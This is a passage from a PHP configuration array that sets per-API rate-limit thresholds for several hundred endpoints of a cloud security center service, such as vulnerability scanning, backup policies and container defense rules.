'countWindow' => 1, 'regionId' => '*', 'api' => 'CancelOnceTask'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeContainerInstances'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListOperationTask'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetCheckConfig'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'AddSasModuleTrial'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListOssScanConfig'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListVulAutoRepairConfig'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'AddPublishBatch'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetSensitiveDefineRuleConfig'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListFileProtectEvent'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeTotalStatistics'], ['threshold' => '20', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateOrUpdateAssetGroup'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribePropertySoftwareItem'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateInterceptionRule'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyClusterCnnfStatusUserConfirm'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeUserSetting'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetOpaPluginStatus'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListAssetCleanConfig'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetClusterStrategyCount'], ['threshold' => '100', 'countWindow' => 1, 'regionId' => '*', 'api' => 'QueryJenkinsImageRegistryPersistenceDay'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifySasContainerWebDefenseRule'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateContainerScanTaskByAppName'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetSasContainerWebDefenseRule'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListOperationProcessDetail'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteSearchCondition'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'SetRegistryScanDayNum'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeExposedInstanceCriteria'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'PageImageRegistry'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'PauseClient'], ['threshold' => '20', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeCheckWarningSummary'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'OperateCommonTargetConfig'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'AddUninstallClientsByUuids'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListRuleTargetAll'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'FinishGuidTask'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeGroupStruct'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeCustomBlockInstances'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetImageEventOperation'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'RetryAgentlessTask'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteUniBackupPolicy'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetCommonSwitchConfig'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeImageRepoList'], ['threshold' => '15', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetConsoleFuncGrayStatus'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeAgentInstallStatus'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeWarningExportInfo'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'UpdateStrictEventName'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'AddSasContainerWebDefenseRule'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetCheckStructure'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ExportVul'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeVulTargetStatistics'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'FixCheckWarnings'], ['threshold' => '20', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetDefenceCount'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'OperateImageVul'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyWebLockStatus'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'OperateCommonOverallConfig'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateRdDefaultSyncList'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeAccessKeyLeakDetail'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'AddIdcProbe'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateDynamicDict'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListMultiUserInstances'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribePropertyPortItem'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteBackupSnapshot'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeWebLockBindList'], ['threshold' => '20', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListPluginForUuid'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListObjectScanEvent'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListVirusScanTask'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'UpdatePublishCron'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateOrUpdateAutoTagRule'], ['threshold' => '30', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeExposedStatistics'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyNoticeConfig'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeNsasSuspEventType'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'AddAssetSelectionCriteria'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'UpdateMultiUserInstances'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetDockerhubImageRiskRankInfo'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribePropertyScheduleConfig'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeSuspEventQuaraFiles'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateCheckPolicy'], ['threshold' => '20', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CheckStsTokenAuth'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeTaskErrorLog'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetBackupAutoConfigStatus'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyRefreshProcessInfo'], ['threshold' => '100', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListSystemRuleAggregationTypes'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateCycleTask'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeCheckFixDetails'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'VerifyCheckInstanceResult'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'IgnoreHcCheckWarnings'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeCloudVendorProductTemplateConfig'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyWebLockRefresh'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeSimilarSecurityEvents'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeAllGroups'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeBackupPolicy'], ['threshold' => '1', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ExportCustomizeReport'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetInterceptionRuleDetail'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeCheckEcsWarnings'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeIdcProbeList'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifySecurityEventMarkMissIndividually'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetRulesCount'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateOpaStrategyNew'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeWebLockProcessBlockStatistics'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'UpdateMaliciousFileWhitelistConfig'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyGroupProperty'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'UpgradeBackupPolicyVersion'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListAgentlessAsset'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeImageRepoDetailList'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateMonitorAccount'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ExportWarning'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeScanTaskStatistics'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeRiskCheckResult'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeCustomBlockRecords'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeUniSupportRegion'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetRegistryScanDayNum'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetCheckSale'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyImageRegistry'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteStrategy'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'RetryInstallProbe'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteContainerPluginRule'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteSoarStrategyTask'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListPublishBatch'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetAegisContainerPluginRuleCriteria'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeImageInstances'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetAssetSelectionConfig'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListVirusScanMachine'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribePropertyUserItem'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'UpdateOssScanConfig'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeRiskItemType'], ['threshold' => '20', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListCompressFileDetectResult'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeCustomizedDict'], ['threshold' => '1', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GenerateOnceTask'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetInstanceAuthRange'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetClusterSuspEventStatistics'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeCountNotScannedImage'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'OpenBackupAutoConfig'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetSecurityScoreRule'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeImageListWithBaselineName'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeVulNumStatistics'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetAegisContainerPluginRule'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'RebootMachine'], ['threshold' => '20', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeGroupedMaliciousFiles'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteCustomizedDict'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeContainerFieldStatistics'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeWebLockFileEvents'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'UpdateAlarmEvent'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListUniBackupRecord'], ['threshold' => '3000', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateBatchUploadUrl'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'FindContainerNetworkConnect'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'OperateApplication'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListOperationProcess'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetCheckRiskStatistics'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeUuidsByVulNames'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyInterceptionRuleSwitch'], ['threshold' => '100', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeAlarmEventDetail'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeImageScanAuthCount'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'QueryGuidTaskList'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListTargetByBatch'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyLoginSwitchConfig'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListCheckResult'], ['threshold' => '20', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeVolDingdingMessage'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'UpdateFileProtectRemark'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeUniBackupPolicyDetail'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'AddCloudVendorTrialConfig'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateAgentlessScanTask'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetSasContainerWebDefenseRuleApplication'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetAuthSummary'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeletePrivateRegistry'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetModuleTrialAuthInfo'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'UpdateJenkinsImageRegistryPersistenceDay'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeCustomizedStrategyTargets'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeIdcAssetCriteria'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeClusterVulStatistics'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeSuspEventExportInfo'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'OperationSuspEvents'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListUuidsByWebPath'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListInterceptionTargetPage'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteAntiBruteForceRule'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyCycleTask'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'EnableCustomBlockRecord'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeContainerStatistics'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeSuspEvents'], ['threshold' => '100', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribePropertySoftwareDetail'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CopyCustomizeReportConfig'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListAgentlessTask'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateMaliciousNote'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateServiceTrail'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeCanTrySas'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateOrUpdateDingTalk'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifySearchCondition'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ChangeCheckConfig'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeCycleTaskList'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'AddPrivateRegistry'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetModuleConfig'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteCustomizeReport'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetInterceptionTargetDetail'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeSecurityEventOperations'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyWebLockDeleteConfig'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'UpdatePublishAutoUpgrade'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeCloudVendorTrialConfig'], ['threshold' => '1000', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateFileDetect'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeExposedInstanceList'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetObjectScanEvent'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeCommonTargetResultList'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeDefaultProxyInstallVersion'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateContainerScanTask'], ['threshold' => '30', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeSuspiciousOverallConfig'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeVulCheckTaskStatusDetail'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListCheckItemWarningMachine'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyAssetImportant'], ['threshold' => '100', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetAssetDetailByUuid'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetModuleConfigStatus'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteInstallCode'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyContainerScanConfig'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribePropertyScaItem'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'StartVirusScanTask'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ChangeUserLang'], ['threshold' => '100', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeAlarmEventStackInfo'], ['threshold' => '100', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetClientInstallationStatistic'], ['threshold' => '100', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ProcessSoarStrategyTask'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeCanAccessVpcSale'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListSupportObjectSuffix'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeNeedAsyncQuery'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetSuspiciousStatistics'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'IgnoreCheckItems'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'UnBindHybridProxy'], ['threshold' => '1000', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetFileDetectResult'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeUniBackupStatistics'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeVulTargetConfig'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetFileProtectRule'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyWebLockUnbind'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateFileProtectRule'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'RollbackSuspEventQuaraFile'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeImageBaselineItemList'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeLogstoreStorage'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeBackupRestoreCount'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeRestorePlans'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeImageBaselineCheckSummary'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeAffectedAssets'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'StartPreCheckDatabase'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyCustomBlockRecord'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateBackupPolicy'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeLoginBaseConfigs'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetFileProtectDashboard'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'MarkMonitorAccounts'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteVulAutoRepairConfig'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeWebPath'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetClusterCheckItemWarningStatistics'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyPushAllTask'], ['threshold' => '100', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyAssetGroup'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeInstallCodes'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'QueryPreCheckDatabase'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribePropertyCronDetail'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeVulFixStatistics'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'UnMarkMonitorAccounts'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetLocalDefaultRegion'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeRiskCheckSummary'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'InstallPmAgent'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyAppVulScanCycle'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeUserBackupMachines'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeInstallCaptcha'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetRdTree'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'AddImageEventOperation'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeCheckResult'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListCloudAssetMatchOperators'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeReportExport'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifySecurityCheckScheduleConfig'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetDataTrend'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ResetLogShipper'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListCloudVendorRegions'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'SubmitOperationTask'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListK8sAccessInfo'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'SetImageSensitiveFileStatus'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyInstanceAntiBruteForceRule'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'BatchOperateCommonOverallConfig'], ['threshold' => '100', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetVulStatistics'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyPostPayModuleSwitch'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'SasInstallCode'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeHybridProxyPolicy'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetLogMeta'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'SetSyncRefreshRegion'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeClusterInfoList'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeStrategyExecDetail'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyInterceptionRule'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'AddContainerDefenseRule'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeImageListBySensitiveFile'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'BatchUpdateMaliciousFileWhitelistConfig'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeClusterBasicInfo'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeSoarStrategyParam'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListUserVpc'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeClusterScannerList'], ['threshold' => '100', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeEventOnStage'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListGroups'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteCustomBlockRecord'], ['threshold' => '100', 'countWindow' => 1, 'regionId' => '*', 'api' => 